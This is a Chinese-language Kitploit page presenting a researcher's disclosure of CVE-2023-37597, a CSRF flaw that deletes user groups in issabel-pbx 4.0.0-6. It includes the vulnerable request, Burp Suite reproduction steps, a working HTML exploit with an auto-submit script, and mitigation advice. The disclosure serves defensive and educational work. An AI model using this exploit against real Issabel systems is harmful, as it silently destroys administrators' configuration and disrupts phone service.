Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-37597 — Issabel-pbx v 4.0.0-6 在其用户组管理功能中存在跨站请求伪造(CSRF)漏洞。 | Kitploit
工具/GitHubGitHub/sahiloj/cve-2023-37597
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试论文与研究学习与教育
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

Issabel-pbx v 4.0.0-6 在其用户组管理功能中存在跨站请求伪造(CSRF)漏洞。

查看仓库
116个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-37597 — issabel-pbx 4.0.0-6:跨站请求伪造(CSRF)——删除用户组

免责声明: 本仓库仅用于教育和授权安全研究目的。请勿对不属于您或未经您明确书面许可的系统使用此利用程序。


目录

  • 概述
  • 漏洞详情
  • 受影响产品
  • 技术分析
  • 攻击场景
  • 概念验证(PoC)
    • 复现步骤
    • PoC 利用代码
  • 影响
  • 缓解与修复措施
  • 披露时间线
  • 参考来源
  • 作者

概述

issabel-pbx 是一款广泛使用的开源统一通信平台(PBX),提供 VoIP 服务、电话管理和基于 Web 的管理功能。issabel-pbx 4.0.0-6 版本的用户组管理功能中存在一个跨站请求伪造(CSRF) 漏洞。

未经身份验证的远程攻击者可以构造一个恶意 HTML 页面,当经过身份验证的管理员访问该页面时,会静默发出伪造的 HTTP POST 请求,从而删除任意用户组。由于应用程序未使用 CSRF 令牌或 SameSite Cookie 策略来验证状态更改请求的来源,浏览器会自动携带管理员的会话 Cookie,导致删除操作在受害者不知情或未经同意的情况下成功。


漏洞详情


受影响产品


技术分析

什么是 CSRF?

跨站请求伪造(CSRF)是一种攻击,攻击者诱骗受害者的浏览器向目标应用程序发送经过身份验证的请求。攻击成功需要满足以下条件:

  1. 受害者与目标应用程序之间存在活跃的经过身份验证的会话。
  2. 应用程序仅依赖会话 Cookie 来验证请求(即没有 CSRF 令牌,没有 Origin/Referer 验证,也没有 SameSite=Strict 或 SameSite=Lax Cookie 属性)。
  3. 攻击者能够预测状态更改请求的结构。

根本原因

issabel-pbx 4.0.0-6 中的用户组删除端点(/index.php?menu=grouplist)处理仅包含 delete 操作和 id_user 参数的 HTTP POST 请求。应用程序没有:

  • 生成或验证同步器(反 CSRF)令牌。
  • 检查 Origin 或 Referer HTTP 头。
  • 在会话 Cookie 上设置 SameSite 属性。

因此,受害浏览器中加载的任何网页都可以静默提交删除表单,并利用受害者现有的会话(浏览器会自动附加会话 Cookie)。

存在漏洞的端点

root@kitploit:~
POST /index.php?menu=grouplist HTTP/1.1
Host: <Issabel IP>

delete=Delete&id_user=<USER_GROUP_ID>

攻击场景

  1. 攻击者构造一个恶意 HTML 页面,其中包含一个隐藏表单,该表单向 Issabel 管理面板发送 POST 删除请求。
  2. 攻击者将此页面发送给经过身份验证的 Issabel 管理员——通过钓鱼邮件、聊天消息中的链接,或嵌入在受损页面中的 ``。
  3. 受害者的浏览器加载页面。JavaScript 自动提交表单,或者受害者被社会工程诱导点击虚假的“Submit”按钮。
  4. Issabel 服务器接收到一个带有管理员会话 Cookie 的有效 POST 请求,并在无需额外确认或令牌验证的情况下删除目标用户组。
  5. 用户组被永久删除,可能破坏呼叫路由、访问控制以及所有依赖于该组的用户,从而在应用程序层面造成拒绝服务。

概念验证(PoC)

警告: 以下 PoC 严格仅用于教育目的。请仅在实验室环境或您获得明确授权的系统中使用。

复现步骤

步骤 1 — 登录 Issabel 管理面板

导航至用户组列表页面,并使用管理员凭据登录。

root@kitploit:~
https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11

管理面板 — 用户组列表


步骤 2 — 捕获删除请求

尝试通过 Burp Suite 代理流量删除一个用户组。右键单击捕获的 POST 请求,选择 Engagement Tools → Generate CSRF PoC,生成利用 HTML 骨架。

Burp Suite — 捕获的 DELETE 请求


步骤 3 — 托管 CSRF 利用页面

将生成的 HTML 保存为文件(参见下面的 PoC 利用代码)。将其托管在攻击者控制的服务器上,或直接发送给受害者。


步骤 4 — 受害者打开利用页面

当经过身份验证的管理员打开或被重定向到利用 URL 时,隐藏表单会自动提交(或受害者点击诱饵按钮)。目标用户组从管理面板中被删除。

利用已提交 — 组已删除(之前)

利用已提交 — 组已删除(之后)


PoC 利用代码

以下 HTML 文件(也提供为 CSRF exploit.html)演示了该攻击。将 {Issabel IP} 替换为目标主机,并调整 id_user 以匹配要删除的组 ID。

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_user" value="7" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

自动提交变体: 为了消除受害者需要点击任何内容的需求,在 <body> 标签内添加以下内容,以便表单在页面加载时自动提交:

root@kitploit:~
<script>document.forms[0].submit();</script>

影响

维度描述
完整性攻击者可以静默删除 Issabel 管理面板中的任意用户组。
可用性删除用户组会破坏属于这些组的所有用户的呼叫路由规则、访问控制和电话服务,相当于部分拒绝服务。
机密性此漏洞不直接影响机密性。

缓解与修复措施

管理员和开发人员应应用以下防御措施:

  1. 实施 CSRF 令牌(同步器令牌模式)

    • 为每个状态更改表单生成唯一、不可预测、每会话(或每请求)的令牌。
    • 在处理任何 POST/PUT/DELETE 操作之前,在服务端验证令牌。
  2. 设置 SameSite Cookie 属性

    • 将会话 Cookie 设置为 SameSite=Lax(最低要求)或 SameSite=Strict,以防止跨源请求携带会话凭据。
    • 示例响应头:Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnly
  3. 验证 Origin 和 Referer 头

    • 在服务端,拒绝 Origin 或 Referer 头与应用程序自身域不匹配的请求。
  4. 对破坏性操作要求重新认证

    • 在删除组或执行其他破坏性操作之前,提示管理员确认密码。
  5. 应用纵深防御

    • 使用 Web 应用防火墙(WAF)规则阻止对敏感端点的意外跨源 POST 请求。

披露时间线

日期事件
2023年7月10日Sahil Ojha 发现并记录漏洞
2023年7月10日分配 CVE-2023-37597
2023年7月10日公开披露

参考来源

  • NVD — CVE-2023-37597
  • OWASP — 跨站请求伪造(CSRF)
  • OWASP CSRF 防护速查表
  • CWE-352: 跨站请求伪造(CSRF)
  • Issabel Foundation — issabelPBX

作者

Sahil Ojha 安全研究员

如果您觉得本研究有用,欢迎 ⭐ 收藏本仓库。

下载工具
字段值
CVE IDCVE-2023-37597
漏洞类型跨站请求伪造(CSRF)
CWECWE-352 — 跨站请求伪造(CSRF)
严重性中危
CVSS 向量CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
受影响版本issabel-pbx 4.0.0-6
披露日期2023年7月10日
研究员Sahil Ojha
字段值
产品名称issabel-pbx
版本4.0.0-6
供应商Issabel Foundation
供应商主页https://www.issabel.org/
源代码https://github.com/IssabelFoundation/issabelPBX
测试环境Windows(Burp Suite 社区版)